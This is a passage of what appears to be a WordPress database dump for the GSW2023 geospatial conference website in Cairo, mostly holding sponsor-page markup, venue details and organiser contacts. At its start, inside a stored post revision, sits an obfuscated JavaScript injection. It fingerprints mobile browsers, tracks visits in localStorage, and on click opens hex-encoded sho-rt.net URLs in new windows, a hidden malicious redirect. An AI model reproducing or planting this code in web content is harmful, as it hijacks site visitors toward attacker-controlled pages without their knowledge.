02978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:25:30','2023-08-13 12:25:30','',3066,'https://gsw2023.com/?p=5110',0,'revision','',0),
(5111,1,'2023-08-13 12:26:24','2023-08-13 12:26:24','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button 